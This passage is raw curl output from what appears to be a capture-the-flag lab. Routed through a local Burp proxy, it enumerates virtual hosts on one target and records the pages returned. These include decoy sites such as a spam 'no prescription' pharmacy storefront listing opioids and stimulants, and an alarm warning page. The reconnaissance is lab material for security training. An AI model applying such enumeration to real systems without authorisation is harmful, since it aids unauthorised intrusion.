  1442. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1443. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1444. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1445. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1446. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1447. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1448. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1449. * ALPN, server did not agree to a protocol
  1450. * Server certificate:
  1451. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1452. *  start date: Jan 21 17:26:12 2014 GMT
  1453. *  expire date: Jan 21 17:26:12 2038 GMT
  1454. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1455. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1456. > GET / HTTP/1.1
  1457. > Host: vaccine4flu.htb
  1458. > User-Agent: curl/7.61.0
  1459. > Accept: */*
  1460. >
  1461. < HTTP/1.1 200 OK
  1462. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1463. < Content-Type: text/html; charset=UTF-8
  1464. < Connection: close
  1465. < Server: ClownWare Proxy
  1466. < Content-Length: 502
  1467. <
  1468. <!DOCTYPE html>
  1469. <html>
  1470.     <head>
  1471.         <style type="text/css">
  1472.             body {
  1473.                 background-color: #000;
  1474.             }
  1475.             img {
  1476.             width: 100%;
  1477.             height: auto;
  1478.         }
  1479.         </style>
  1480.     </head>
  1481.     <body>
  1482.         <center>
  1483.             <img src="/getvacc.gif"/>
  1484.             <img src="/getvacc.gif"/>
  1485.             <img src="/getvacc.gif"/>
  1486.             <img src="/getvacc.gif"/>
  1487.             <img src="/getvacc.gif"/>
  1488.         </center>
  1489.     </body>
  1490. * Closing connection 0
  1491. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1492. </html>
  1493.  
  1494. bestmedsupply.htb
  1495. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1496. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1497. *   Trying 127.0.0.1...
  1498. * TCP_NODELAY set
  1499. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1500. * allocate connect buffer!
  1501. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1502. > CONNECT 10.10.10.144:443 HTTP/1.1
  1503. > Host: 10.10.10.144:443
  1504. > User-Agent: curl/7.61.0
  1505. > Proxy-Connection: Keep-Alive
  1506. >
  1507. < HTTP/1.0 200 Connection established
  1508. <
  1509. * Proxy replied 200 to CONNECT request
  1510. * CONNECT phase completed!
  1511. * ALPN, offering h2
  1512. * ALPN, offering http/1.1
  1513. * successfully set certificate verify locations:
  1514. *   CAfile: none
  1515.   CApath: /etc/ssl/certs
  1516. * (304) (OUT), TLS handshake, Client hello (1):
  1517. * CONNECT phase completed!
  1518. * CONNECT phase completed!
  1519. * (304) (IN), TLS handshake, Server hello (2):
  1520. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1521. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1522. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1523. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1524. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1525. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1526. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1527. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1528. * ALPN, server did not agree to a protocol
  1529. * Server certificate:
  1530. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1531. *  start date: Jan 21 17:26:12 2014 GMT
  1532. *  expire date: Jan 21 17:26:12 2038 GMT
  1533. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1534. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1535. > GET / HTTP/1.1
  1536. > Host: bestmedsupply.htb
  1537. > User-Agent: curl/7.61.0
  1538. > Accept: */*
  1539. >
  1540. < HTTP/1.1 200 OK
  1541. < Date: Thu, 20 Dec 2018 00:41:10 GMT
  1542. < Content-Type: text/html; charset=UTF-8
  1543. < Connection: close
  1544. < Server: ClownWare Proxy
  1545. < Content-Length: 21065
  1546. <
  1547. <!DOCTYPE html>
  1548. <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" class=" mod-js mod-svg mod-boxsizing mod-mediaqueries" lang="en-US"><head>
  1549. <title>BUY ONLINE DRUG|MY HEALTH ONLINE CARE</title>
  1550. <meta name="viewport" content="width=device-width">
  1551. <link rel="canonical" href="https://bestmedsupply.htb/mens-health.html">
  1552. <link rel="shortcut icon" href="https://bestmedsupply.htb/favicon.ico" type="image/x-icon">
  1553. <link href="index_files/css.css" rel="stylesheet" type="text/css">
  1554. <link rel="stylesheet" type="text/css" href="index_files/normalize.css" media="screen">
  1555. <link rel="stylesheet" type="text/css" href="index_files/grid.css" media="screen">
  1556. <link rel="stylesheet" type="text/css" href="index_files/common.css" media="screen">
  1557. <link rel="stylesheet" type="text/css" href="index_files/black.css" media="screen">
  1558. <link rel="stylesheet" type="text/css" href="index_files/superfish.css" media="screen">
  1559. <link rel="stylesheet" type="text/css" href="index_files/superfish-vertical.css" media="screen">
  1560. <link rel="stylesheet" type="text/css" href="index_files/superfish-mobile.css" media="screen and (max-width:650px)">
  1561. <link rel="stylesheet" type="text/css" href="index_files/style.css">
  1562. <!--[if IE 7]>
  1563. <link rel="stylesheet" type="text/css" href="https://bestmedsupply.htb/skins/e-tone/icomoon/ie7/ie7.css" />
  1564. <![endif]-->
  1565. <link rel="stylesheet" type="text/css" href="index_files/styles.css" media="screen">
  1566.  
  1567. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  1568. <meta name="description" content="Online Pharmacy without prescription medicine. Modest Online Pharmacy. Online Drugstore no RX. Spare your Time and Money! Purchase Generic Buy Generic cialis 20 mg online…">
  1569. <meta name="keywords" content="Buy Adderall 30mg online,Buy Levitra Vardenafil 10 mg online,Buy Viagra Sildenafil Citrate 200mg,Buy Cialis Tadalifil Citrate 40mg Online,Buy Ritalin Methylphenidate 10mg Online,Buy cheap tramadol 100mg online">
  1570. <meta name="robots" content="index, follow">
  1571. <meta name="generator" content="cubecart">
  1572.  
  1573. <script src="index_files/enquire.js"></script><script src="index_files/superfish.js"></script><script src="index_files/script.js"></script><script type="text/javascript" async="" src="index_files/ga.js"></script><script type="text/javascript">
  1574. var _gaq = _gaq || [];
  1575. _gaq.push(['_setAccount', 'UA-112093729-1 ']);
  1576. _gaq.push(['_trackPageview'])
  1577. (function() {
  1578.     var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  1579.     ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  1580.     var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  1581. })();
  1582. </script>
  1583.  
  1584. </head>
  1585.  
  1586. <body class="category">
  1587.  
  1588. <div id="header">
  1589.     <div class="container">
  1590.         <div id="utility" class="not-wide not-normal">
  1591.         </div>
  1592.     </div>
  1593. </div>
  1594.  
  1595. <div class="container" id="container">
  1596.     <div class="row" id="logo">
  1597.         <div class="u12"><a href="https://bestmedsupply.htb/"><img src="index_files/xrhealthy112.png" alt="Mens Health - online pharmacy"></a></div>
  1598.     </div>
  1599.     <div class="row" id="documents">
  1600.         <div class="u12">
  1601.             <ul class="documents">
  1602.             <li>
  1603.         <a href="https://bestmedsupply.htb/about-us.html" title="About Us">
  1604.             About Us
  1605.         </a>
  1606.     </li>
  1607.         <li>
  1608.         <a href="https://bestmedsupply.htb/terms-and-conditions.html" title="Terms and Conditions">
  1609.             Terms and Conditions
  1610.         </a>
  1611.     </li>
  1612.         <li>
  1613.         <a href="https://bestmedsupply.htb/privacy-policy.html" title="Privacy Policy">
  1614.             Privacy Policy
  1615.         </a>
  1616.     </li>
  1617.    
  1618.         </ul>
  1619.         </div>
  1620.     </div>
  1621.    
  1622.        
  1623.     <div id="page">
  1624.     <div class="row">
  1625.         <div class="u3 sidebar" id="sidebar-left">
  1626.             <div class="box">
  1627.             <div id="navigation">
  1628.     <h3 id="navigation-toggle"><span>Shop by Category</span></h3>
  1629.     <ul class="sf-menu sf-vertical sf-mobile sf-js-enabled sf-arrows">
  1630.         <li>
  1631.   <a href="https://bestmedsupply.htb/adhd.html" title="ADHD">ADHD</a>
  1632.   </li><li>
  1633.   <a href="https://bestmedsupply.htb/mens-health.html" title="Mens Health">Mens Health</a>
  1634.   </li><li>
  1635.   <a href="https://bestmedsupply.htb/anti-anxiety.html" title="Anti Anxiety">Anti Anxiety</a>
  1636.   </li><li>
  1637.   <a href="https://bestmedsupply.htb/pain-killers.html" title="Pain Killers">Pain Killers</a>
  1638.   </li>
  1639.                     </ul>
  1640. </div>
  1641.             <div id="quick_search">
  1642.     <!--<h3>Search</h3>-->
  1643.     <form action="/index.php?_a=category" method="get">
  1644.         <input type="hidden" name="_a" value="category" original="category">
  1645.         <p class="btn-pair input">
  1646.             <input name="search[keywords]" type="text" id="keywords" class="left" title="Search our store" size="18" original="Search our store" value="Search our store">
  1647.             <button type="submit" class="right" original=""><span class="icon icon-search"></span><!--Search--></button>
  1648.         </p>
  1649.         <a href="https://bestmedsupply.htb/search.html">Advanced Search</a>
  1650.     </form>
  1651. </div>
  1652.             </div>
  1653.                         <div class="box not-narrow not-mobile"><div id="popular_products">
  1654.     <h3><span class="icon icon-star3"></span> Best Sellers</h3>
  1655.     <ol>
  1656.                 <li><a href="https://bestmedsupply.htb/buy-tramadol-100mg-online-no-prescription.html" title="Buy Tramadol 100mg online no prescription ">Buy Tramadol 100mg online no prescription </a></li>
  1657.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-adderall-30mg-online.html" title="Buy Soma 350mg Online">Buy Soma 350mg Online</a></li>
  1658.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-adderall-30mg-online-p23.html" title="Buy Adderall 30mg online">Buy Adderall 30mg online</a></li>
  1659.                 <li><a href="https://bestmedsupply.htb/anti-anxiety/buy-xanax-online-1mg.html" title="Buy Soma 500mg online">Buy Soma 500mg online</a></li>
  1660.                 <li><a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online">Buy Oxycodone 40mg Online</a></li>
  1661.                 <li><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Buy Ritalin (Methylphenidate) 10mg Online</a></li>
  1662.        
  1663.     </ol>
  1664. </div></div>        </div>
  1665.        
  1666.         <div class="u6" id="content">
  1667.             <ul id="breadcrumb">
  1668.                 <li class="first"><a href="https://bestmedsupply.htb/">Home</a></li>
  1669.                                 <li><a href="https://bestmedsupply.htb/mens-health.html">Mens Health</a></li>
  1670.                
  1671.             </ul>
  1672.            
  1673.                         <h1>Mens Health</h1>
  1674.  
  1675.  
  1676.  
  1677.  
  1678. <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="control">
  1679.     <span class="pagination"></span>
  1680.         <span class="sort">
  1681.     Sort by
  1682.     <select name="sort" class="auto_submit" original="name|ASC">
  1683.         <option value="">-- Please Select --</option>
  1684.                 <option value="name|DESC">Name (Z-A)</option>
  1685.                 <option value="name|ASC" selected="selected">Name (A-Z)</option>
  1686.                 <option value="date_added|DESC">Date Added (Newest First)</option>
  1687.                 <option value="date_added|ASC">Date Added (Oldest First)</option>
  1688.                 <option value="price|DESC">Price (High-Low)</option>
  1689.                 <option value="price|ASC">Price (Low-High)</option>
  1690.        
  1691.     </select>
  1692.     <input type="submit" value="Sort" original="Sort" style="display: none;">
  1693.     </span>
  1694.     </form>
  1695.  
  1696. <div class="product-list">
  1697.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P20">
  1698.         <p class="image">
  1699.             <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">
  1700.                 <img src="index_files/Buy_Cialis__Tadalifil_Citrate__40mg_Online.jpg" alt="Buy Cialis (Tadalifil Citrate) 40mg Online">
  1701.             </a>
  1702.                     </p>
  1703.         <div class="info">
  1704.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">Buy Cialis (Tadalifil Citrate)</a></p>
  1705.            
  1706.                         <p class="price">$1.25</p>
  1707.                        
  1708.             <p class="actions">
  1709.                 <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-40mg-online.html" title="Buy Cialis (Tadalifil Citrate) 40mg Online">Info</a>
  1710.                                 <input type="hidden" name="add[20][quantity]" value="1" class="quantity" original="1">
  1711.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P20')" original="Buy">
  1712.                             </p>
  1713.         </div>
  1714.     </form>
  1715.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P19">
  1716.         <p class="image">
  1717.             <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">
  1718.                 <img src="index_files/Buy_Cialis__Tadalifil_Citrate__40mg_Online.jpg" alt="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">
  1719.             </a>
  1720.                     </p>
  1721.         <div class="info">
  1722.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">Buy Generic cialis 20 mg online…</a></p>
  1723.            
  1724.                         <p class="price">$0.90</p>
  1725.                        
  1726.             <p class="actions">
  1727.                 <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Generic cialis 20 mg online (Tadalifil Citrate) 20mg  online">Info</a>
  1728.                                 <input type="hidden" name="add[19][quantity]" value="1" class="quantity" original="1">
  1729.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P19')" original="Buy">
  1730.                             </p>
  1731.         </div>
  1732.     </form>
  1733.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P22">
  1734.         <p class="image">
  1735.             <a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">
  1736.                 <img src="index_files/Buy_Levitra__Vardenafil__10_mg_online.jpg" alt="Buy Levitra (Vardenafil) 10 mg online">
  1737.             </a>
  1738.                     </p>
  1739.         <div class="info">
  1740.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">Buy Levitra (Vardenafil) 10 mg online</a></p>
  1741.            
  1742.                         <p class="price">$1.10</p>
  1743.                        
  1744.             <p class="actions">
  1745.                 <a href="https://bestmedsupply.htb/mens-health/buy-levitra-vardenafil-10-mg-online.html" title="Buy Levitra (Vardenafil) 10 mg online">Info</a>
  1746.                                 <input type="hidden" name="add[22][quantity]" value="1" class="quantity" original="1">
  1747.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P22')" original="Buy">
  1748.                             </p>
  1749.         </div>
  1750.     </form>
  1751.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P17">
  1752.         <p class="image">
  1753.             <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">
  1754.                 <img src="index_files/Ritalin__Methylphenidate__10mg.jpg" alt="Buy Ritalin (Methylphenidate) 10mg Online">
  1755.             </a>
  1756.                     </p>
  1757.         <div class="info">
  1758.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Buy Ritalin (Methylphenidate)</a></p>
  1759.            
  1760.                         <p class="price">$0.95</p>
  1761.                        
  1762.             <p class="actions">
  1763.                 <a href="https://bestmedsupply.htb/mens-health/buy-cialis-tadalifil-citrate-20mg.html" title="Buy Ritalin (Methylphenidate) 10mg Online">Info</a>
  1764.                                 <input type="hidden" name="add[17][quantity]" value="1" class="quantity" original="1">
  1765.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P17')" original="Buy">
  1766.                             </p>
  1767.         </div>
  1768.     </form>
  1769.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P18">
  1770.         <p class="image">
  1771.             <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">
  1772.                 <img src="index_files/Buy_Viagra__Sildenafil_Citrate__100mg_Online.jpg" alt="Buy Viagra (Sildenafil Citrate) 100mg Online">
  1773.             </a>
  1774.                     </p>
  1775.         <div class="info">
  1776.             <p class="title"><a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">Buy Viagra (Sildenafil Citrate)</a></p>
  1777.            
  1778.                         <p class="price">$0.75</p>
  1779.                        
  1780.             <p class="actions">
  1781.                 <a href="https://bestmedsupply.htb/mens-health/buy-viagra-sildenafil-citrate-100mg-online.html" title="Buy Viagra (Sildenafil Citrate) 100mg Online">Info</a>
  1782.                                 <input type="hidden" name="add[18][quantity]" value="1" class="quantity" original="1">
  1783.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P18')" original="Buy">
  1784.                             </p>
  1785.         </div>
  1786.     </form>
  1787.         <form action="https://bestmedsupply.htb/mens-health.html" method="post" enctype="application/x-www-form-urlencoded" class="product addForm" id="P21">
  1788.         <p class="image">
  1789.             <a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">
  1790.                 <img src="index_files/Buy_Viagra__Sildenafil_Citrate__200mg.jpg" alt="Buy Viagra (Sildenafil Citrate) 200mg">
  1791.             </a>
  1792.                     </p>
  1793.         <div class="info">
  1794.             <p class="title"><a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">Buy Viagra (Sildenafil Citrate) 200mg</a></p>
  1795.            
  1796.                         <p class="price">$0.85</p>
  1797.                        
  1798.             <p class="actions">
  1799.                 <a href="https://bestmedsupply.htb/buy-viagra-sildenafil-citrate-200mg.html" title="Buy Viagra (Sildenafil Citrate) 200mg">Info</a>
  1800.                                 <input type="hidden" name="add[21][quantity]" value="1" class="quantity" original="1">
  1801.                 <input type="submit" value="Buy" class="btn button_add_basket" onclick="$.add2cart('P21')" original="Buy">
  1802.                             </p>
  1803.         </div>
  1804.     </form>
  1805.    
  1806. </div>
  1807.  
  1808. <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="control">
  1809.     <span class="pagination"></span>
  1810.         <span class="sort">
  1811.     Sort by
  1812.     <select name="sort" class="auto_submit" original="name|ASC">
  1813.       <option value="">-- Please Select --</option>
  1814.           <option value="name|DESC">Name (Z-A)</option>
  1815.           <option value="name|ASC" selected="selected">Name (A-Z)</option>
  1816.           <option value="date_added|DESC">Date Added (Newest First)</option>
  1817.           <option value="date_added|ASC">Date Added (Oldest First)</option>
  1818.           <option value="price|DESC">Price (High-Low)</option>
  1819.           <option value="price|ASC">Price (Low-High)</option>
  1820.      
  1821.     </select>
  1822.     <input type="submit" value="Sort" original="Sort" style="display: none;">
  1823.     </span>
  1824.     </form>
  1825.  
  1826.         </div>
  1827.        
  1828.         <div class="u3 sidebar not-narrow" id="sidebar-right">
  1829.             <div class="box not-mobile" id="sessionbox">
  1830.             <div id="session">
  1831.         <p id="session_false">
  1832.         <a href="https://bestmedsupply.htb/login.html" title="Log In" class="btn"><span class="icon icon-login"></span> Log In</a> or <a href="https://bestmedsupply.htb/register.html" title="Register" class="btn">Register</a>
  1833.     </p>
  1834.     </div>
  1835.             <br>
  1836.             <div id="basket_summary">
  1837.   <h3 class="not-narrow not-mobile"><span class="icon icon-basket"></span> Your Shopping Basket</h3>
  1838.     <p class="not-narrow not-mobile">Your basket is empty.</p>
  1839.     <p class="basket_total">
  1840.     <span class="not-narrow not-mobile">Total:</span>
  1841.     <span class="icon icon-basket not-wide not-normal"></span>
  1842.     <b>$0.00</b>
  1843.   </p>
  1844.   <p class="view_basket"><a href="https://bestmedsupply.htb/index.php?_a=basket" title="View Basket" class="btn">View Basket</a></p>
  1845. </div>
  1846.             </div>
  1847.             <div class="box not-narrow not-mobile" id="randombox"><div id="featured_product">
  1848.     <form action="https://bestmedsupply.htb/mens-health.html" method="post" class="top addForm" enctype="application/x-www-form-urlencoded">
  1849.         <h3>Featured Product</h3>
  1850.         <p class="image">
  1851.             <a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online"><img src="index_files/Buy_Oxycodone_40mg_Online.png" alt="Buy Oxycodone 40mg Online"></a>
  1852.         </p>
  1853.         <p class="title"><a href="https://bestmedsupply.htb/pain-killers/buy-oxycodone-40mg-online-p9.html" title="Buy Oxycodone 40mg Online">Buy Oxycodone 40mg Online</a></p>
  1854.                 <p class="price">$1.75</p>
  1855.                         <div class="button">
  1856.             <input type="hidden" name="add[9][quantity]" value="1" original="1">
  1857.             <input type="submit" class="button_add_basket" value="Buy now" original="Buy now">
  1858.         </div>
  1859.             </form>
  1860. </div></div>
  1861.             <div class="box not-mobile" id="maillistbox"><div id="mailing_list">
  1862.     <h3><span class="icon icon-envelope"></span> Mailing List</h3>
  1863.         <form action="https://bestmedsupply.htb/mens-health.html" method="post">
  1864.         <p>Enter your e-mail address to receive our newsletter</p>
  1865.         <p class="btn-pair input">
  1866.             <input name="subscribe" type="text" class="required left" size="18" maxlength="250" title="Email" original="Email" value="Email">
  1867.             <input type="submit" class="submit right" value="Subscribe" original="Subscribe">
  1868.         </p>
  1869.     </form>
  1870.     </div></div>        </div>
  1871.     </div>
  1872.     </div>
  1873.    
  1874.     <div id="footer">
  1875.         <div class="row">
  1876.             <div class="u12">
  1877.                
  1878.             </div>
  1879.         </div>
  1880.         <div class="row">
  1881.                         <div class="u2"><form id="language_select" action="https://bestmedsupply.htb/mens-health.html" method="post">
  1882.     <!--Change Language-->
  1883.     <select name="set_language" class="auto_submit" original="en-US">
  1884.                 <option value="en-GB">English (UK)</option>
  1885.                 <option value="en-US" selected="selected">English (US)</option>
  1886.        
  1887.     </select>
  1888.     <input type="submit" value="Submit" original="Submit" style="display: none;">
  1889. </form></div>
  1890.                                     <div class="u2"><form id="currency_select" action="https://bestmedsupply.htb/mens-health.html" method="post">
  1891.     <!--Change Currency-->
  1892.     <select name="set_currency" class="auto_submit" original="USD">
  1893.                 <option value="USD" selected="selected" title="United States dollar">$ USD </option>
  1894.                 <option value="JPY" title="Japanese yen">¥ JPY </option>
  1895.                 <option value="GBP" title="Pound Sterling">£ GBP </option>
  1896.                 <option value="CAD" title="Canadian Dollar">$ CAD </option>
  1897.                 <option value="EUR" title="Euro">€ EUR </option>
  1898.                 <option value="AUD" title="Australian Dollar">$ AUD </option>
  1899.        
  1900.     </select>
  1901.     <input type="submit" value="Submit" original="Submit" style="display: none;">
  1902. </form></div>
  1903.                                             </div>
  1904.     </div>
  1905. </div>
  1906.  
  1907.  
  1908.  
  1909. <!-- Load JavaScript last -->
  1910. <script type="text/javascript" src="index_files/jquery.js"></script>
  1911. <script type="text/javascript" src="index_files/jquery-ui.js"></script>
  1912. <script type="text/javascript" src="index_files/plugins.php"></script>
  1913. <script type="text/javascript" src="index_files/common.js"></script>
  1914.  
  1915.  
  1916.  
  1917. <script type="text/javascript" src="index_files/modernizr.js"></script>
  1918. <script>
  1919.  
  1920. Modernizr.load([
  1921.     {
  1922.         test: window.matchMedia,
  1923.         nope: "https://bestmedsupply.htb/skins/e-tone/js/media.match.min.js"
  1924.     },
  1925.    
  1926.     "https://bestmedsupply.htb/skins/e-tone/js/enquire.min.js",
  1927.     "https://bestmedsupply.htb/skins/e-tone/js/superfish.js",
  1928.     "https://bestmedsupply.htb/skins/e-tone/js/script.js"
  1929.    
  1930. ]);
  1931. </script>
  1932.  
  1933. <!--[if IE 7]>
  1934. <script type="text/javascript">
  1935. $('.row > *').each(function(){
  1936.     var fullW = $(this).outerWidth(),
  1937.     actualW = $(this).width(),
  1938.     wDiff = fullW - actualW,
  1939.     newW = actualW - wDiff;
  1940.     $(this).css('width',newW);
  1941. });
  1942. </script>
  1943. <script type="text/javascript" src="{$STORE_URL}/skins/{$SKIN_FOLDER}/icomoon/ie7/ie7.js"></script>
  1944. <![endif]-->
  1945.  
  1946.  
  1947.  
  1948.  
  1949. <div id="cboxOverlay" style="display: none;"></div><div id="colorbox" class="" role="dialog" tabindex="-1" style="display: none;"><div id="cboxWrapper"><div><div id="cboxTopLeft" style="float: left;"></div><div id="cboxTopCenter" style="float: left;"></div><div id="cboxTopRight" style="float: left;"></div></div><div style="clear: left;"><div id="cboxMiddleLeft" style="float: left;"></div><div id="cboxContent" style="float: left;"><div id="cboxTitle" style="float: left;"></div><div id="cboxCurrent" style="float: left;"></div><button type="button" id="cboxPrevious" original=""></button><button type="button" id="cboxNext" original=""></button><button type="button" id="cboxSlideshow" original=""></button><div id="cboxLoadingOverlay" style="float: left;"></div><div id="cboxLoadingGraphic" style="float: left;"></div></div><div id="cboxMiddleRight" style="float: left;"></div></div><div style="clear: left;"><div id="cboxBottomLeft" style="float: left;"></div><div id="cboxBottomCenter" style="float: left;"></div><div id="cboxBottomRight" style="float: left;"></div></div></div><div style="position: absolute; width: 9999px; visibility: hidden; display: none; max-width: none;"></div></div></body></html>
  1950. * Closing connection 0
  1951. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  1952.  
  1953. custoomercare.megabank.htb
  1954. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  1955. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  1956. *   Trying 127.0.0.1...
  1957. * TCP_NODELAY set
  1958. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  1959. * allocate connect buffer!
  1960. * Establish HTTP proxy tunnel to 10.10.10.144:443
  1961. > CONNECT 10.10.10.144:443 HTTP/1.1
  1962. > Host: 10.10.10.144:443
  1963. > User-Agent: curl/7.61.0
  1964. > Proxy-Connection: Keep-Alive
  1965. >
  1966. < HTTP/1.0 200 Connection established
  1967. <
  1968. * Proxy replied 200 to CONNECT request
  1969. * CONNECT phase completed!
  1970. * ALPN, offering h2
  1971. * ALPN, offering http/1.1
  1972. * successfully set certificate verify locations:
  1973. *   CAfile: none
  1974.   CApath: /etc/ssl/certs
  1975. * (304) (OUT), TLS handshake, Client hello (1):
  1976. * CONNECT phase completed!
  1977. * CONNECT phase completed!
  1978. * (304) (IN), TLS handshake, Server hello (2):
  1979. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  1980. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  1981. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  1982. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  1983. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  1984. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  1985. * TLSv1.2 (IN), TLS handshake, Finished (20):
  1986. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  1987. * ALPN, server did not agree to a protocol
  1988. * Server certificate:
  1989. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  1990. *  start date: Jan 21 17:26:12 2014 GMT
  1991. *  expire date: Jan 21 17:26:12 2038 GMT
  1992. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  1993. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1994. > GET / HTTP/1.1
  1995. > Host: custoomercare.megabank.htb
  1996. > User-Agent: curl/7.61.0
  1997. > Accept: */*
  1998. >
  1999. < HTTP/1.1 200 OK
  2000. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2001. < Content-Type: text/html; charset=UTF-8
  2002. < Connection: close
  2003. < Server: ClownWare Proxy
  2004. < Content-Length: 521
  2005. <
  2006. <!DOCTYPE html>
  2007. <html>
  2008.     <head>
  2009.         <title>WARNING!</title>
  2010.         <embed src="/kill-alarm.webm" volume="100" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  2011.     </head>
  2012.         <style type="text/css">
  2013.             body {
  2014.                 background-color: #A4000F;
  2015.             }
  2016.             img {
  2017.             width: 90%;
  2018.             height: auto;
  2019.         }
  2020.         </style>
  2021.     </head>
  2022.     <body>
  2023.         <center>
  2024.             <img src="/warning.png"/>
  2025.  
  2026.         </center>
  2027.     </body>
  2028. * Closing connection 0
  2029. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2030. </html>
  2031.  
  2032. flowerzrus.htb
